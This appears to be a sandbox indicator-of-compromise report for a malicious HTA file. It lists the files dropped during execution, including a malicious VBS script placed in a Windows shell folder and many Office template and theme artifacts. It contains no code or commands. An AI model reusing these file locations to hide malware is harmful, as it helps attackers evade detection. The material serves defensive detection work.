IOC Report
MSkUffzfPy.hta

Files

File Path
Type
Category
Malicious
MSkUffzfPy.hta
HTML document, ASCII text, with very long lines (6957), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Shell\Layouts.vbs
ASCII text, with very long lines (708), with CRLF line terminators
dropped
malicious
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xa05c6d62, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf
TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
dropped
C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\Tokenuserer\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{E88C1528-3361-4E98-BC90-C88BCB3C5BB2}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\623-6341-11.docx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703139962058600_6F6325B3-64B6-4D5D-9618-B4D5AE6B3602.log
data
dropped
C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1727703139962592100_6F6325B3-64B6-4D5D-9618-B4D5AE6B3602.log
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8010.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8010.tmp\ThemePictureAccent.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8026.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8026.tmp\harvardanglia2008officeonline.xsl
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD803A.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD803A.tmp\ConvergingText.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD803B.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD803B.tmp\PictureFrame.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD804B.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD804B.tmp\InterconnectedBlockProcess.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8062.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8062.tmp\mlaseventheditionofficeonline.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8072.tmp\BracketList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8072.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8084.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8084.tmp\sist02.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80A7.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80A7.tmp\TabbedArc.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD80B8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80B8.tmp\chevronaccent.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD80D8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80D8.tmp\ThemePictureGrid.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD80D9.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80D9.tmp\iso690nmerical.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80F9.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80F9.tmp\VaryingWidthList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD80FA.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80FA.tmp\turabian.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD80FB.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD80FB.tmp\rings.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD810C.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD810C.tmp\HexagonRadial.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD811E.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD811E.tmp\Element design set.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD813E.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD813E.tmp\Equations.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD814F.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD814F.tmp\iso690.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8150.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8150.tmp\ieee2006officeonline.xsl
XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8160.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8160.tmp\TabList.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8161.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8161.tmp\architecture.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8183.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8183.tmp\gosttitle.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8184.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8184.tmp\pictureorgchart.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8195.tmp\Banded.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8195.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81A6.tmp\Basis.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD81A6.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81B6.tmp\CircleProcess.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD81B6.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B7.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B7.tmp\gb.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81B8.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81B8.tmp\chicago.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD81DB.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81DB.tmp\ThemePictureAlternatingAccent.glox
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD81FC.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD81FC.tmp\Text Sidebar (Annual Report Red and Black design).docx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\TCD821C.tmp\Frame.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD821C.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD822D.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD822D.tmp\gostname.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD824D.tmp\APASixthEditionOfficeOnline.xsl
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD824D.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD827E.tmp\Metropolitan.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD827E.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD82EE.tmp\Wood_Type.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD82EE.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD82FF.tmp\View.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD82FF.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8300.tmp\Parallax.thmx
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8300.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8321.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8321.tmp\RadialPictureList.glox
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8341.tmp\Parcel.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8341.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD83A2.tmp\Quotable.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD83A2.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD83E2.tmp\Berlin.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD83E2.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD84B0.tmp\Savon.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD84B0.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD84D0.tmp\Gallery.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD84D0.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8530.tmp\Circuit.thmx
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\TCD8530.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD85DE.tmp\Droplet.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD85DE.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8767.tmp\Slate.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8767.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8787.tmp\Damask.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8787.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8883.tmp\Mesh.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8883.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8931.tmp\Main_Event.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8931.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\TCD8AF9.tmp\Vapor_Trail.thmx
Microsoft OOXML
dropped
C:\Users\user\AppData\Local\Temp\TCD8AF9.tmp\content.inf
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\TCD8B58.tmp\Content.inf
data
dropped
C:\Users\user\AppData\Local\Temp\TCD8B58.tmp\Insight design set.dotx
Microsoft Word 2007+
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecxmkvvv.jmg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eja4jrzd.rlk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emeqr1zm.v0h.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqgxppgh.5v2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iljpsi0b.euh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnrs02qd.tvs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\cab7FD4.tmp
Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE5.tmp
Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE6.tmp
Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE7.tmp
Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE8.tmp
Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FE9.tmp
Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEA.tmp
Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEB.tmp
Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEC.tmp
Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FED.tmp
Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FEE.tmp
Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab7FFF.tmp
Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8000.tmp
Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8011.tmp
Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8022.tmp
Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8023.tmp
Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8024.tmp
Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8025.tmp
Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8027.tmp
Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8028.tmp
Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8029.tmp
Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804C.tmp
Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804D.tmp
Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804E.tmp
Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab804F.tmp
Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8050.tmp
Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8051.tmp
Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8073.tmp
Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8085.tmp
Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8096.tmp
Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8097.tmp
Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab810D.tmp
Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8162.tmp
Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8173.tmp
Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81C9.tmp
Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81CA.tmp
Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab81FB.tmp
Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab824E.tmp
Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab828E.tmp
Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab82CE.tmp
Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8310.tmp
Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8362.tmp
Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab83A1.tmp
Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab846F.tmp
Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab848F.tmp
Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab84F0.tmp
Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab85AE.tmp
Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab86E8.tmp
Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab86E9.tmp
Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8825.tmp
Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab88E2.tmp
Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8A8A.tmp
Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
dropped
C:\Users\user\AppData\Local\Temp\cab8AD9.tmp
Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
dropped
C:\Users\user\AppData\Local\Temp\~$3-6341-11.docx
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx (copy)
Microsoft OOXML
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx (copy)
Microsoft OOXML
dropped
